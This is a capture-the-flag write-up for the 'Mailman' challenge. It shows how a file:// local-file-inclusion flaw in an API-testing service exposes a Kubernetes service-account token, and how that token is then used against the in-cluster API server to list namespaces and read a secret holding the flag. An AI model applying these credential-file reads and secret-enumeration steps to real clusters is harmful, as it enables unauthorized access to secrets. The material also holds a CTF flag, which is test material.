CTFtime.org

Mailman

by TwentyOneCool / Tinfoil Hats

Tags: lfi kubernetes ssrf 

Rating: 4.0

The URL holds an "API testing" webservice, which can execute HTTP requests.
According to the "About" page, the service is hosted using Kubernetes and uses *Kubernetes Secrets*.

We can quickly find, the service supports not only `https://` but also the `file://` scheme and will show us the content of local files (*local file inclusion*).

Accessing `file:///etc/mtab` we find the following mountpoint:

tmpfs /run/secrets/kubernetes.io/serviceaccount tmpfs ro,relatime 0 0

Getting the content of `/run/secrets/kubernetes.io/serviceaccount/token` we get a JWT for the pod's serviceaccount whose payload is

```json
{
"aud": [
"https://container.googleapis.com/v1/projects/intigriti-ctf/locations/europe-west1/clusters/ctf-challenge-cluster"
],
"exp": 1678563987,
"iat": 1647027987,
"iss": "https://container.googleapis.com/v1/projects/intigriti-ctf/locations/europe-west1/clusters/ctf-challenge-cluster",
"kubernetes.io": {
"namespace": "default",
"pod": {
"name": "mailman-6cf46d68fb-68b4q",
"uid": "27017847-da2f-4b54-aa42-b405826f1b2c"
},
"serviceaccount": {
"name": "mailman",
"uid": "80dc4673-8097-47a6-b847-917a0cacfbbd"
},
"warnafter": 1647031594
},
"nbf": 1647027987,
"sub": "system:serviceaccount:default:mailman"
}
```

We should now try to access the Kubernetes API server.
Add the token obtained above to the request as a bearer token (HTTP header `Autorization` with the value `Bearer xxx`) in the webinterface.
The API server is always accessible within a pod at the domain name `kubernetes.default.svc` ([reference](https://kubernetes.io/docs/tasks/run-application/access-api-from-pod/#directly-accessing-the-rest-api))

Accessing https://kubernetes.default.svc/api/v1/namespaces/default/ (while using the bearer token) works succesfully.
Unfortunately we do not have the permissions to read the secrets from the namespace (https://kubernetes.default.svc/api/v1/namespaces/default/secrets or https://kubernetes.default.svc/api/v1/namespaces/default/secrets/flag)

Maybe the flag is in a different namespace?
By accessing `https://kubernetes.default.svc/api/v1/namespaces` we find the list of namespaces available in the cluster:

["ctf","default","gatekeeper-system","kube-node-lease","kube-public","kube-system","nginx-ingress","secretstuff"]

The last one called `secretstuff` sounds promising. We look at the list of secrets in that one at `https://kubernetes.default.svc/api/v1/namespaces/secretstuff/secrets` and we can find the base64 encoded flag there

{"flag":"MTMzN1VQezAyODMzOTQyODNiODFmZjMwNzgwYzlmMWVmNTYyODQ1fQo="}

which decodes to **1337UP{0283394283b81ff30780c9f1ef562845}**

Comments